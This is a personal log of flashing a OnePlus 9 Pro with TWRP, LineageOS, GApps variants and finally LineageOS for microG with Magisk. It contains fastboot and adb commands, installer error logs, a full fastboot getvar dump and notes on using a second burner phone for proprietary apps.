* <https://android.stackexchange.com/questions/222262/how-to-create-manually-create-my-own-%e1%b4%8f%e1%b4%9b%e1%b4%80-update-file-to-be-used-for-adb-sideload>
* <https://android.stackexchange.com/questions/95425/update-zip-just-for-fixing-file-permissions-possible>
* <https://forum.xda-developers.com/t/tutorial-the-updater-script-completely-explained.2377695/>
* <https://www.bettermobileapp.com/article/10558021/Updater-script>
* <https://android.stackexchange.com/questions/191043/edditing-updater-script>
* <https://androidforums.com/threads/custom-rom-updater-scipt-troubleshooting.701752/>
* <https://android.stackexchange.com/questions/35600/how-to-create-an-update-zip-file-that-can-copy-rename-a-file>
* <https://developer.android.com/studio/command-line/zipalign>
* <https://developer.android.com/studio/publish/app-signing#opt-out>
* <https://developer.android.com/studio/command-line/apksigner>
* <https://www.addictivetips.com/mobile/what-is-zipalign-in-android-and-how-it-works-complete-guide/>
* <https://stackoverflow.com/questions/3994035/what-is-aligned-memory-allocation>
* <https://www.androidcentral.com/installing-android-sdk-windows-mac-and-linux-tutorial>
### Let's try TWRP+Lineage+MindTheGapps - fail
#### Install TWRP
<https://www.getdroidtips.com/replace-lineageos-recovery-twrp/>
1. Reboot phone to fastboot or something (the built-in one where the volume key changes options), leave it in that state
1. `fastboot devices` on linux should show the phone
1. `fastboot boot twrp.img` (already downloaded and symlinked above)
1. Phone reboots into twrp temporarily
1. Advanced > flash current twrp
1. Reboot (ok the no-OS warning)
1. Yay, booted into twrp, comforting
#### Install LineageOS (yet again)
* Well, let's get a new nightly
* Instructions say check model...
* Reboot to twrp (recovery) with USB connected to laptop
* Laptop pops window for new mount `mtp://OnePlus_LE2123_dade278d/`
* Yep, LE2123 is in the supported list. Phew.
* Skip all the "recovery" steps in <https://wiki.lineageos.org/devices/lemonadep/install>
* I'm guessing I don't need to run "copy partitions" again because that's to avoid only having one working slot, and I already have to having done this before. Tell me if I'm wrong!
* Give up waiting for new image download (~1GB), continue with older image...
* Factory reset
* TWRP > Wipe > Swipe for factory reset
* back
* Format Data (button)
* type yes to continue (wiping all apps & data)
* back to main menu (android back button lots of times)
* Flash lineage
* Still in TWRP
* Advanced > ADB Sideload
* Tick the wipe boxes ("Dalvik cache" + "cache")
* Swipe to sart sideload
* `adb sideload lineage-18.1-20211228-nightly-lemonadep-signed.zip`
* back
* Don't reboot yet
* Add MindTheGaps
* still in TWRP
* ADB Sideload
* swipe (cache wipe still selected)
* `adb sideload MindTheGapps-11.0.0-arm64-20210920_084011.zip`
* fail. log:
```
**********************
MindTheGapps installer
**********************
Extracting files
Setting up environment
Mounting partitions
Could not mount /mnt/system! Aborting
Updater process ended with ERROR: 1
```
For goodness sake.
Fuck it, let's try the other gapps even though it says not to....
Reboot just to have a look... Lineage running fine, no sign of any gapps.
### Let's try TWRP+Lineage+OpenGApps - fail
* Power off
* power + vol-down - ended up in lineage recovery, wat?? swap slot??
* reboot to bootloader? no that's the built-in pixelated bright green "START" thing, oh actually that's fine, that's the fastboot thing.
* switch slot as above
```
fastboot set_active other
Setting current slot to 'b'
... OKAY [ 0.048s]
Finished. Total time: 0.056s
```
* reboot to recovery
* back in TWRP
That's cool! I have lineage recovery in slot `a` and TWRP in slot `b`.
Okay, back to the plan.
#### Lineage (again again again...)
* Repeat the lineage intall steps above (no idea if that's really necessary but *shrug*)
#### OpenGApps install - fail
* Download <https://opengapps.org/?api=11.0&variant=nano> - ARM64 / 11 / nano
* (manually changed from 10 to 11 from link on <https://wiki.lineageos.org/gapps>)
* download the md5 too
* `md5sum -c *.md5` to validate...
* Back to ADB Sideload in TWRP (cache wipe ticked x2), swipe to start
* `adb sideload open_gapps-arm64-11.0-nano-20220215.zip`
* cross fingers
* bah. failed, basically same error.
```
- Performing system space calculations
Insufficient storage space available in
System partition. ...
...
Error Code: 70
```
grap logs as instructed: `adb pull /sdcard/open_gapps_log.txt` - success
[gist of log file open_gapps_log.txt](https://gist.github.com/timabell/c4f16fd656f3faf8a16d06aa113e0346)
Important bit here is that there is **ZERO** space, so choosing smaller install is not going to work.
```
...
Current Free Space | 0
...
```
Well on the plus side the diagnostics are muuuuch better in OpenGApps so that's saved me fucking around trying to patch MindTheGaps' installer.
## Two-phone-Timmy - the burner phone
Having spent some time completely stumped by the space issue and giving it some thought I realize that this battle with Android will never end. Trying to get an unholy mix of Libre and proprietary to mix is like oil and water.
I can opt out of that battle by running two phones.
1. A "primary" phone that I use as much as possible, running the Free-est thing I can muster. This would get the sim card. This would be the OnePlus 9 pro, ideally running PureOS as per the Librem 5 phone, but if not that then Lineage without the GApps that I couldn't get to work.
2. A burner phonee that's basically stock Android so that I can fall back to this for everything that can't or won't work on a free-er & unlocked base OS. (My existing OnePlus 5t for now while it lasts, reset to stock OxygenOS). This one can the get internet by tethering to the primary. I don't think any of the apps actually require the sim to be present. I guess we'll see.
### The primary (9 Pro)
The idea here is to get the free-est possible base layer (i.e. operating system), and then get maximum functionality within that. Anything that doesn't work or I can't find a working alternative to gets punted to the burner phone while we wait for hell to freeze over again. This will be the compromise for now.
* Research trying PureOS, see what the app ecosystem is like - done - nope
* research done, doesn't seem to be possible to install on the OnePlus. Next...
* Continue with Lineage (I left the phone with a working but empty install of this)
* **Don't install proprietary google play services or play store at all.** - This is the line in the sand. I would have accepted it for now, but given I couldn't install it, I'll take it as the new battle line for free vs proprietary.
* Install microG for re-implementation of shared services (i.e. location, polling for updates from servers etc)
* Install Aurora play store proxy again to be able to try out app store apps
* See how close I can get to a usable phone.
### The burner (5t)
* Factory reset the 5t
* Install just what I couldn't get to work on the primary
* Cry because the backups were shit and now I've lost access to something I care about (I predict)
## Primary setup - experimenting
Fired up the lineage (minus all google stuff) that I'd installed and then failed to get any gapps on (space issue above, no longer care).
Went through language prompt, was looking at time prompt in setup wizard when the phone rebooted with some kind of couldn't read data error. Disturbing. Rebooted, selected "try again" and it didn't do it this time.
### Setup wizard
- selected UK location,
- GMT timezone.
- Put in wifi password (incorrectly)
- set up pin
- set up fingerprint
- booted into OS (yay, pleasing to see Lineage in action)
### OS update with on-phone updater
settings > advanced > updater
shows list of OS updates. hit refresh, nothing new. latest is 18.1 26th Apr 2022
tap download ....
tap intall (even longer pause ... installing ... finalising package installation ...) ..
reboot (press button that's presented)
### config
* turn off annoying sounds
* settings > sound > advanced
* screen locking sound - off
* touch sounds - off
### todo
* replacement contact management (currently using google)
* replacement calendar management (currently using google)
* insert sim
### already google-free
* email (fastmail domain + k9mail app)
* broswer - firefox
* search - duckduckgo
* OTP - andOTP
* maps/satnav (partially) - could use waze + maps.me (google maps is a decent car satnav, not found a perfect equivalent)
## burner phone
No sim in this one, use wifi and/or bluetooth tethering to get internet on it.
Things I can't escape the googly jail for
* google maps?
* apps for clients
* microsoft outlook
* securid (vpn stuff)
* google authenticator (use andOTP instead wherever possible)
* microsoft authenticator (yuck, what's wrong with the OTP standard?!?!)
* digidentity
* banking apps that don't work on the primary phone (not naming because haxxors)
* google pay (never used it, just use an actual card)
* google home for controlling the chromecast
* spotify just for casting to the chromecast audio
To my horror I have discovered that android allows apps to force remote admin privs so that IT departments can snoop on your BYOD. Hello Microsoft Outlook + Active Directory. Yet more erosion of user rights in the name of security. There's no way in hell I'm allowing a client to be an admin on my primary phone so this is burner phone territory if at all necessary; though I just won't install any of that junk at all and will be uncontactable within their network unless on their supplied devices. Shrug.
## Primary phone - microG
### lineage+microG - failed install
Re-run setup in section: Installing “Lineage for microG”
* OS install
* power off
* boot into lineage recovery (vol-down + power) (currently slot "b" is active)
* "apply update" > "apply from adb" (aka sideload)
* `adb sideload lineage-18.1-20211220-microG-lemonadep.zip`
* it seems this is flashed to slot a and then slot is automatically swapped
* ignore signature warning
* accept downgrade warning
* completed
* back back
* factory reset
* reboot
* drops to bootloader thing
* "start" (power button to accept)
* loops back to bootloader thing. damn.
* vol down vol down - Recovery - power button to accept
* starts lineage recovery - "Active slot: a" - hmmm
try swap slot
```
$ fastboot set_active other
Setting current slot to 'b' (bootloader) Changing the active slot with a snapshot applied may cancel the update.
OKAY [ 0.038s]
Finished. Total time: 0.040s
```
power off, power on
that worked, now enters the lineage setup steps
oh but it's back to the blank OS, the apr 2022 version!.
guess there's a slot for two OSes!
swap slot again, back to the bootloader loop. interesting.
let's try installing again
```
fastboot set_active other
Setting current slot to 'a' OKAY [ 0.060s]
Finished. Total time: 0.061s
```
```
tim@max:~/Downloads/oneplus9pro/lineage-for-microG
$ adb sideload lineage-18.1-20211220-microG-lemonadep.zip
serving: 'lineage-18.1-20211220-microG-lemonadep.zip' (~21%)
```
factory reset
reboot
cross fingers. nope. still just drops back to bootloader
recovery > factory reset > reboot
nope still fooked
reboot to bootloader which says "Active slot: b" which is a bit odd. Maybe it does a swap slot automatically after flashing?
so at this point slot a has a fooked lineage-microG (maybe) and slot b has a functioning but blank vanilla lineage. I think.
<https://www.reddit.com/r/GooglePixel/comments/8cz6m9/google_pixel_bootslot_b_brick/>
grab the vars with `fastboot getvar all 2>&1 | sort > fastboot-getvar.txt`
output (sensitive things redacted with XXXX) - interesting but not super helpful:
```
all:
(bootloader) battery-voltage:0
(bootloader) cpu-abi:arm64-v8a
(bootloader) current-slot:b
(bootloader) dynamic-partition:true
(bootloader) first-api-level:30
(bootloader) has-slot:abl_log:no
(bootloader) has-slot:abl:yes
(bootloader) has-slot:ALIGN_TO_128K_1:no
(bootloader) has-slot:ALIGN_TO_128K_2:no
(bootloader) has-slot:android_log:no
(bootloader) has-slot:aop:yes
(bootloader) has-slot:apdp_full:no
(bootloader) has-slot:apdp:no
(bootloader) has-slot:bluetooth:yes
(bootloader) has-slot:boot:yes
(bootloader) has-slot:carrier:no
(bootloader) has-slot:cdt:no
(bootloader) has-slot:connsec:no
(bootloader) has-slot:cpucp:yes
(bootloader) has-slot:ddr:no
(bootloader) has-slot:devcfg:yes
(bootloader) has-slot:devinfo:no
(bootloader) has-slot:dinfo:no
(bootloader) has-slot:dip:no
(bootloader) has-slot:DRIVER:no
(bootloader) has-slot:dsp:yes
(bootloader) has-slot:dtbo:yes
(bootloader) has-slot:engineering_cdt:yes
(bootloader) has-slot:featenabler:yes
(bootloader) has-slot:frp:no
(bootloader) has-slot:fsc:no
(bootloader) has-slot:fsg:no
(bootloader) has-slot:hyp_log:no
(bootloader) has-slot:hyp:yes
(bootloader) has-slot:imagefv:yes
(bootloader) has-slot:kernel_log:no
(bootloader) has-slot:keymaster:yes
(bootloader) has-slot:keystore:no
(bootloader) has-slot:limits-cdsp:no
(bootloader) has-slot:limits:no
(bootloader) has-slot:logdump:no
(bootloader) has-slot:logfs:no
(bootloader) has-slot:mdcompress:no
(bootloader) has-slot:mdtpsecapp:yes
(bootloader) has-slot:mdtp:yes
(bootloader) has-slot:metadata:no
(bootloader) has-slot:misc:no
(bootloader) has-slot:modemdump:no
(bootloader) has-slot:modemst1:no
(bootloader) has-slot:modemst2:no
(bootloader) has-slot:modem:yes
(bootloader) has-slot:multiimgoem:yes
(bootloader) has-slot:ocdt:no
(bootloader) has-slot:odm_b-cow:no
(bootloader) has-slot:odm:yes
(bootloader) has-slot:oplusdycnvbk:no
(bootloader) has-slot:opluslog:no
(bootloader) has-slot:oplusreserve1:no
(bootloader) has-slot:oplusreserve2:no
(bootloader) has-slot:oplusreserve3:no
(bootloader) has-slot:oplusreserve4:no
(bootloader) has-slot:oplusreserve5:no
(bootloader) has-slot:oplus_sec:yes
(bootloader) has-slot:oplusstanvbk:yes
(bootloader) has-slot:param:no
(bootloader) has-slot:persist_bkp:no
(bootloader) has-slot:persist:no
(bootloader) has-slot:product_b-cow:no
(bootloader) has-slot:product:yes
(bootloader) has-slot:qmcs:no
(bootloader) has-slot:qsee_log:no
(bootloader) has-slot:qupfw:yes
(bootloader) has-slot:qweslicstore:yes
(bootloader) has-slot:rawdump:no
(bootloader) has-slot:rtice:no
(bootloader) has-slot:sda:no
(bootloader) has-slot:sdb:no
(bootloader) has-slot:sdc:no
(bootloader) has-slot:sdd:no
(bootloader) has-slot:sde:no
(bootloader) has-slot:sdf:no
(bootloader) has-slot:secdata:no
(bootloader) has-slot:shrm:yes
(bootloader) has-slot:splash:yes
(bootloader) has-slot:spunvm:no
(bootloader) has-slot:ssd:no
(bootloader) has-slot:storsec:no
(bootloader) has-slot:super:no
(bootloader) has-slot:system_b-cow:no
(bootloader) has-slot:system_ext_b-cow:no
(bootloader) has-slot:system_ext:yes
(bootloader) has-slot:system:yes
(bootloader) has-slot:tzsc:no
(bootloader) has-slot:tz:yes
(bootloader) has-slot:uefisecapp:yes
(bootloader) has-slot:uefivarstore:no
(bootloader) has-slot:userdata:no
(bootloader) has-slot:vbmeta_system:yes
(bootloader) has-slot:vbmeta_vendor:yes
(bootloader) has-slot:vbmeta:yes
(bootloader) has-slot:vendor_b-cow:no
(bootloader) has-slot:vendor_boot:yes
(bootloader) has-slot:vendor:yes
(bootloader) has-slot:vm-bootsys:yes
(bootloader) has-slot:vm-data:no
(bootloader) has-slot:xbl_config:yes
(bootloader) has-slot:xbl:yes
(bootloader) hw-revision:0
(bootloader) is-logical:abl_a:no
(bootloader) is-logical:abl_b:no
(bootloader) is-logical:abl_log:no
(bootloader) is-logical:ALIGN_TO_128K_1:no
(bootloader) is-logical:ALIGN_TO_128K_2:no
(bootloader) is-logical:android_log:no
(bootloader) is-logical:aop_a:no
(bootloader) is-logical:aop_b:no
(bootloader) is-logical:apdp_full:no
(bootloader) is-logical:apdp:no
(bootloader) is-logical:bluetooth_a:no
(bootloader) is-logical:bluetooth_b:no
(bootloader) is-logical:boot_a:no
(bootloader) is-logical:boot_b:no
(bootloader) is-logical:carrier:no
(bootloader) is-logical:cdt:no
(bootloader) is-logical:connsec:no
(bootloader) is-logical:cpucp_a:no
(bootloader) is-logical:cpucp_b:no
(bootloader) is-logical:ddr:no
(bootloader) is-logical:devcfg_a:no
(bootloader) is-logical:devcfg_b:no
(bootloader) is-logical:devinfo:no
(bootloader) is-logical:dinfo:no
(bootloader) is-logical:dip:no
(bootloader) is-logical:DRIVER:no
(bootloader) is-logical:dsp_a:no
(bootloader) is-logical:dsp_b:no
(bootloader) is-logical:dtbo_a:no
(bootloader) is-logical:dtbo_b:no
(bootloader) is-logical:engineering_cdt_a:no
(bootloader) is-logical:engineering_cdt_b:no
(bootloader) is-logical:featenabler_a:no
(bootloader) is-logical:featenabler_b:no
(bootloader) is-logical:frp:no
(bootloader) is-logical:fsc:no
(bootloader) is-logical:fsg:no
(bootloader) is-logical:hyp_a:no
(bootloader) is-logical:hyp_b:no
(bootloader) is-logical:hyp_log:no
(bootloader) is-logical:imagefv_a:no
(bootloader) is-logical:imagefv_b:no
(bootloader) is-logical:kernel_log:no
(bootloader) is-logical:keymaster_a:no
(bootloader) is-logical:keymaster_b:no
(bootloader) is-logical:keystore:no
(bootloader) is-logical:limits-cdsp:no
(bootloader) is-logical:limits:no
(bootloader) is-logical:logdump:no
(bootloader) is-logical:logfs:no
(bootloader) is-logical:mdcompress:no
(bootloader) is-logical:mdtp_a:no
(bootloader) is-logical:mdtp_b:no
(bootloader) is-logical:mdtpsecapp_a:no
(bootloader) is-logical:mdtpsecapp_b:no
(bootloader) is-logical:metadata:no
(bootloader) is-logical:misc:no
(bootloader) is-logical:modem_a:no
(bootloader) is-logical:modem_b:no
(bootloader) is-logical:modemdump:no
(bootloader) is-logical:modemst1:no
(bootloader) is-logical:modemst2:no
(bootloader) is-logical:multiimgoem_a:no
(bootloader) is-logical:multiimgoem_b:no
(bootloader) is-logical:ocdt:no
(bootloader) is-logical:odm_b-cow:yes
(bootloader) is-logical:odm_b:yes
(bootloader) is-logical:oplusdycnvbk:no
(bootloader) is-logical:opluslog:no
(bootloader) is-logical:oplusreserve1:no
(bootloader) is-logical:oplusreserve2:no
(bootloader) is-logical:oplusreserve3:no
(bootloader) is-logical:oplusreserve4:no
(bootloader) is-logical:oplusreserve5:no
(bootloader) is-logical:oplus_sec_a:no
(bootloader) is-logical:oplus_sec_b:no
(bootloader) is-logical:oplusstanvbk_a:no
(bootloader) is-logical:oplusstanvbk_b:no
(bootloader) is-logical:param:no
(bootloader) is-logical:persist_bkp:no
(bootloader) is-logical:persist:no
(bootloader) is-logical:product_b-cow:yes
(bootloader) is-logical:product_b:yes
(bootloader) is-logical:qmcs:no
(bootloader) is-logical:qsee_log:no
(bootloader) is-logical:qupfw_a:no
(bootloader) is-logical:qupfw_b:no
(bootloader) is-logical:qweslicstore_a:no
(bootloader) is-logical:qweslicstore_b:no
(bootloader) is-logical:rawdump:no
(bootloader) is-logical:rtice:no
(bootloader) is-logical:sda:no
(bootloader) is-logical:sdb:no
(bootloader) is-logical:sdc:no
(bootloader) is-logical:sdd:no
(bootloader) is-logical:sde:no
(bootloader) is-logical:sdf:no
(bootloader) is-logical:secdata:no
(bootloader) is-logical:shrm_a:no
(bootloader) is-logical:shrm_b:no
(bootloader) is-logical:splash_a:no
(bootloader) is-logical:splash_b:no
(bootloader) is-logical:spunvm:no
(bootloader) is-logical:ssd:no
(bootloader) is-logical:storsec:no
(bootloader) is-logical:super:no
(bootloader) is-logical:system_b-cow:yes
(bootloader) is-logical:system_b:yes
(bootloader) is-logical:system_ext_b-cow:yes
(bootloader) is-logical:system_ext_b:yes
(bootloader) is-logical:tz_a:no
(bootloader) is-logical:tz_b:no
(bootloader) is-logical:tzsc:no
(bootloader) is-logical:uefisecapp_a:no
(bootloader) is-logical:uefisecapp_b:no
(bootloader) is-logical:uefivarstore:no
(bootloader) is-logical:userdata:no
(bootloader) is-logical:vbmeta_a:no
(bootloader) is-logical:vbmeta_b:no
(bootloader) is-logical:vbmeta_system_a:no
(bootloader) is-logical:vbmeta_system_b:no
(bootloader) is-logical:vbmeta_vendor_a:no
(bootloader) is-logical:vbmeta_vendor_b:no
(bootloader) is-logical:vendor_b-cow:yes
(bootloader) is-logical:vendor_boot_a:no
(bootloader) is-logical:vendor_boot_b:no
(bootloader) is-logical:vendor_b:yes
(bootloader) is-logical:vm-bootsys_a:no
(bootloader) is-logical:vm-bootsys_b:no
(bootloader) is-logical:vm-data:no
(bootloader) is-logical:xbl_a:no
(bootloader) is-logical:xbl_b:no
(bootloader) is-logical:xbl_config_a:no
(bootloader) is-logical:xbl_config_b:no
(bootloader) is-userspace:yes
(bootloader) max-download-size:0x10000000
(bootloader) partition-size:abl_a:0x800000
(bootloader) partition-size:abl_b:0x800000
(bootloader) partition-size:abl_log:0xFD0000
(bootloader) partition-size:ALIGN_TO_128K_1:0x1A000
(bootloader) partition-size:ALIGN_TO_128K_2:0x1A000
(bootloader) partition-size:android_log:0xFD0000
(bootloader) partition-size:aop_a:0x80000
(bootloader) partition-size:aop_b:0x80000
(bootloader) partition-size:apdp:0x40000
(bootloader) partition-size:apdp_full:0x40000
(bootloader) partition-size:bluetooth_a:0x200000
(bootloader) partition-size:bluetooth_b:0x200000
(bootloader) partition-size:boot_a:0xC000000
(bootloader) partition-size:boot_b:0xC000000
(bootloader) partition-size:carrier:0x4000000
(bootloader) partition-size:cdt:0x20000
(bootloader) partition-size:connsec:0x20000
(bootloader) partition-size:cpucp_a:0x100000
(bootloader) partition-size:cpucp_b:0x100000
(bootloader) partition-size:ddr:0x100000
(bootloader) partition-size:devcfg_a:0x20000
(bootloader) partition-size:devcfg_b:0x20000
(bootloader) partition-size:devinfo:0x1000
(bootloader) partition-size:dinfo:0x4000
(bootloader) partition-size:dip:0x100000
(bootloader) partition-size:DRIVER:0x2000000
(bootloader) partition-size:dsp_a:0x4000000
(bootloader) partition-size:dsp_b:0x4000000
(bootloader) partition-size:dtbo_a:0x1800000
(bootloader) partition-size:dtbo_b:0x1800000
(bootloader) partition-size:engineering_cdt_a:0x100000
(bootloader) partition-size:engineering_cdt_b:0x100000
(bootloader) partition-size:featenabler_a:0x20000
(bootloader) partition-size:featenabler_b:0x20000
(bootloader) partition-size:frp:0x80000
(bootloader) partition-size:fsc:0x20000
(bootloader) partition-size:fsg:0x300000
(bootloader) partition-size:hyp_a:0x800000
(bootloader) partition-size:hyp_b:0x800000
(bootloader) partition-size:hyp_log:0xFD0000
(bootloader) partition-size:imagefv_a:0x200000
(bootloader) partition-size:imagefv_b:0x200000
(bootloader) partition-size:kernel_log:0xFD0000
(bootloader) partition-size:keymaster_a:0x80000
(bootloader) partition-size:keymaster_b:0x80000
(bootloader) partition-size:keystore:0x80000
(bootloader) partition-size:limits:0x1000
(bootloader) partition-size:limits-cdsp:0x1000
(bootloader) partition-size:logdump:0x4000000
(bootloader) partition-size:logfs:0x800000
(bootloader) partition-size:mdcompress:0x1400000
(bootloader) partition-size:mdtp_a:0x2000000
(bootloader) partition-size:mdtp_b:0x2000000
(bootloader) partition-size:mdtpsecapp_a:0x400000
(bootloader) partition-size:mdtpsecapp_b:0x400000
(bootloader) partition-size:metadata:0x1000000
(bootloader) partition-size:misc:0x100000
(bootloader) partition-size:modem_a:0x14A00000
(bootloader) partition-size:modem_b:0x14A00000
(bootloader) partition-size:modemdump:0x12C00000
(bootloader) partition-size:modemst1:0x300000
(bootloader) partition-size:modemst2:0x300000
(bootloader) partition-size:multiimgoem_a:0x8000
(bootloader) partition-size:multiimgoem_b:0x8000
(bootloader) partition-size:ocdt:0x20000
(bootloader) partition-size:odm_b:0x2BD000
(bootloader) partition-size:odm_b-cow:0x2C1000
(bootloader) partition-size:oplusdycnvbk:0xA00000
(bootloader) partition-size:opluslog:0x10000000
(bootloader) partition-size:oplusreserve1:0x800000
(bootloader) partition-size:oplusreserve2:0x10000000
(bootloader) partition-size:oplusreserve3:0x4000000
(bootloader) partition-size:oplusreserve4:0x2000000
(bootloader) partition-size:oplusreserve5:0x4000000
(bootloader) partition-size:oplus_sec_a:0xA00000
(bootloader) partition-size:oplus_sec_b:0xA00000
(bootloader) partition-size:oplusstanvbk_a:0xA00000
(bootloader) partition-size:oplusstanvbk_b:0xA00000
(bootloader) partition-size:param:0x800000
(bootloader) partition-size:persist:0x2000000
(bootloader) partition-size:persist_bkp:0x2000000
(bootloader) partition-size:product_b:0x1652F000
(bootloader) partition-size:product_b-cow:0x16696000
(bootloader) partition-size:qmcs:0x1E00000
(bootloader) partition-size:qsee_log:0xFD0000
(bootloader) partition-size:qupfw_a:0x14000
(bootloader) partition-size:qupfw_b:0x14000
(bootloader) partition-size:qweslicstore_a:0x40000
(bootloader) partition-size:qweslicstore_b:0x40000
(bootloader) partition-size:rawdump:0x8000000
(bootloader) partition-size:rtice:0x80000
(bootloader) partition-size:sda:0x3A10800000
(bootloader) partition-size:sdb:0x800000
(bootloader) partition-size:sdc:0x800000
(bootloader) partition-size:sdd:0x2000000
(bootloader) partition-size:sde:0x180000000
(bootloader) partition-size:sdf:0x2000000
(bootloader) partition-size:secdata:0x7000
(bootloader) partition-size:shrm_a:0x20000
(bootloader) partition-size:shrm_b:0x20000
(bootloader) partition-size:splash_a:0x20A4000
(bootloader) partition-size:splash_b:0x20A4000
(bootloader) partition-size:spunvm:0x2000000
(bootloader) partition-size:ssd:0x2000
(bootloader) partition-size:storsec:0x20000
(bootloader) partition-size:super:0x29B000000
(bootloader) partition-size:system_b:0x406A4000
(bootloader) partition-size:system_b-cow:0x40AAC000
(bootloader) partition-size:system_ext_b:0xDF3A000
(bootloader) partition-size:system_ext_b-cow:0xE01B000
(bootloader) partition-size:tz_a:0x400000
(bootloader) partition-size:tz_b:0x400000
(bootloader) partition-size:tzsc:0x20000
(bootloader) partition-size:uefisecapp_a:0x200000
(bootloader) partition-size:uefisecapp_b:0x200000
(bootloader) partition-size:uefivarstore:0x80000
(bootloader) partition-size:userdata:0x3751FB3000
(bootloader) partition-size:vbmeta_a:0x10000
(bootloader) partition-size:vbmeta_b:0x10000
(bootloader) partition-size:vbmeta_system_a:0x10000
(bootloader) partition-size:vbmeta_system_b:0x10000
(bootloader) partition-size:vbmeta_vendor_a:0x10000
(bootloader) partition-size:vbmeta_vendor_b:0x10000
(bootloader) partition-size:vendor_b:0x50520000
(bootloader) partition-size:vendor_b-cow:0x50A27000
(bootloader) partition-size:vendor_boot_a:0xC000000
(bootloader) partition-size:vendor_boot_b:0xC000000
(bootloader) partition-size:vm-bootsys_a:0x10625000
(bootloader) partition-size:vm-bootsys_b:0x10625000
(bootloader) partition-size:vm-data:0x20A4000
(bootloader) partition-size:xbl_a:0x600000
(bootloader) partition-size:xbl_b:0x600000
(bootloader) partition-size:xbl_config_a:0x80000
(bootloader) partition-size:xbl_config_b:0x80000
(bootloader) product:OnePlus9Pro
(bootloader) secure:yes
(bootloader) security-patch-level:2021-12-05
(bootloader) serialno:XXXXXXX
(bootloader) slot-count:2
(bootloader) snapshot-update-status:snapshotted
(bootloader) super-partition-name:super
(bootloader) system-fingerprint:OnePlus/OnePlus9Pro_EEA/OnePlus9Pro:11/RKQ1.201105.002/2111112053:user/release-keys
(bootloader) treble-enabled:true
(bootloader) unlocked:yes
(bootloader) vendor-fingerprint:OnePlus/OnePlus9Pro_EEA/OnePlus9Pro:11/RKQ1.201105.002/2111112053:user/release-keys
(bootloader) version:0.4
(bootloader) version-baseband:
(bootloader) version-bootloader:unknown
(bootloader) version-os:11
(bootloader) version-vndk:30
Finished. Total time: 1.181s
```
Fuck. Again. ... TBC. AGAIN. how many more yaks are left to shave one wonders.
todo:
* skip all the guided setup steps
* open the microG app
* run the self check
* magisk root if needed
* everything else
### config
* settings
* sound
* advanced
* screen locking sound - off
* touch sounds - off
* system
* advanced
* gestures
* power menu
* advanced restart - on
### Lineage+microG+Magisk again - success!
Let's try downloading the latest and flashing again.
<https://download.lineage.microg.org/lemonadep/?sort=time&order=asc>
```
tim@max:~/Downloads/oneplus9pro/lineage-for-microG
$ ll lineage-18.1-2022040*
-rw-rw-r-- 1 tim tim 192M Apr 30 20:38 lineage-18.1-20220401-microG-lemonadep-recovery.img
-rw-rw-r-- 1 tim tim 1.1G Apr 30 20:39 lineage-18.1-20220405-microG-lemonadep.zip
-rw-rw-r-- 1 tim tim 3.9K Apr 30 20:37 lineage-18.1-20220405-microG-lemonadep.zip.prop
-rw-rw-r-- 1 tim tim 109 Apr 30 20:37 lineage-18.1-20220405-microG-lemonadep.zip.sha256sum
$ sha256sum -c lineage-18.1-20220405-microG-lemonadep.zip.sha256sum
lineage-18.1-20220405-microG-lemonadep.zip: OK
tim@max:~/Downloads/oneplus9pro/lineage-for-microG
$ cd update_verifier-master
tim@max:~/Downloads/oneplus9pro/lineage-for-microG/update_verifier-master
$ python update_verifier.py lineageos4microg_pubkey ../lineage-18.1-20220405-microG-lemonadep.zip
verified successfully
```
We'll do a swap slot again so that it won't overwrite the currently working lineage install.
Vol-down + power button to enter recovery (from powered off).
Lineage recovery says "Active slot: b" at the top. Let's boot it, check what we have, swap, boot again to see the other...
* slot b: broken install - drops to bootloader
* slot a: also broken ...., erm I swear I booted that. wtf. phones.
so that means I should swap slot so that "a" is active, so that fastboot flashes over the broken "b" and then swaps to it without touching the currently working "a" slot.
Use lineage bootloader to format the system just to see if that fixes the broken install. .... Nope. Both slots still fubar.
Right, well, flashing time either way.
put phone into recover "update > apply from adb" mode
`adb sideload lineage-18.1-20220405-microG-lemonadep.zip`
long pause...
back > reboot system
hurrah, a lineage boot animation
rattle through setup steps again, did wifi, nothing else
todo: fingerprint and pin
todo: re-root with magisk before doing anything else
new things compared to plain lineage: f-droid & microG apps
installed andOTP & vespucci (OSM editor) from f-droid
---
enable developer options (system > about phone, tap lots of times)
system > advanced > developer options > usb debugging ON + Disable adb authorisation timeout (so that if my screen fails or the software misbehaves I can get my files over a usb cable)
Install Magisk by John Wu via F-Droid instead of adb this time
Extract the updated payload:
```
tim@max:~/Downloads/oneplus9pro/lineage-for-microG
$ cd payload
tim@max:~/Downloads/oneplus9pro/lineage-for-microG/payload
$ ../../payload-dumper-go/payload-dumper-go_1.2.0_linux_amd64/payload-dumper-go ../lineage-18.1-20220405-microG-lemonadep.zip
Please wait while extracting payload.bin from the archive.
payload.bin: /tmp/payload_208101762.bin
Payload Version: 2
Payload Manifest Length: 94295
Payload Manifest Signature Length: 267
Found partitions:
boot (201 MB), dtbo (25 MB), odm (2.9 MB), product (378 MB), system (1.1 GB), system_ext (234 MB), vbmeta (8.2 kB), vbmeta_system (4.1 kB), vendor (1.3 GB), vendor_boot (201 MB)
Number of workers: 4
odm (2.9 MB) [==============================================================================================] 100 %
boot (201 MB) [==============================================================================================] 100 %
dtbo (25 MB) [==============================================================================================] 100 %
product (378 MB) [==============================================================================================] 100 %
system (1.1 GB) [==============================================================================================] 100 %
system_ext (234 MB) [==============================================================================================] 100 %
vbmeta (8.2 kB) [==============================================================================================] 100 %
vbmeta_system (4.1 kB) [==============================================================================================] 100 %
vendor (1.3 GB) [==============================================================================================] 100 %
vendor_boot (201 MB) [==============================================================================================] 100 %
tim@max:~/Downloads/oneplus9pro/lineage-for-microG/payload
$ ll
total 4.0K
drwxr-xr-x 2 tim tim 4.0K Apr 30 21:34 extracted_20220430_213414
tim@max:~/Downloads/oneplus9pro/lineage-for-microG/payload
$ ll extracted_20220430_213414
total 3.3G
-rwxr-xr-x 1 tim tim 192M Apr 30 21:34 boot.img
-rwxr-xr-x 1 tim tim 24M Apr 30 21:34 dtbo.img
-rwxr-xr-x 1 tim tim 2.8M Apr 30 21:34 odm.img
-rwxr-xr-x 1 tim tim 361M Apr 30 21:34 product.img
-rwxr-xr-x 1 tim tim 224M Apr 30 21:34 system_ext.img
-rwxr-xr-x 1 tim tim 1.1G Apr 30 21:34 system.img
-rwxr-xr-x 1 tim tim 8.0K Apr 30 21:34 vbmeta.img
-rwxr-xr-x 1 tim tim 4.0K Apr 30 21:34 vbmeta_system.img
-rwxr-xr-x 1 tim tim 192M Apr 30 21:34 vendor_boot.img
-rwxr-xr-x 1 tim tim 1.3G Apr 30 21:35 vendor.img
```
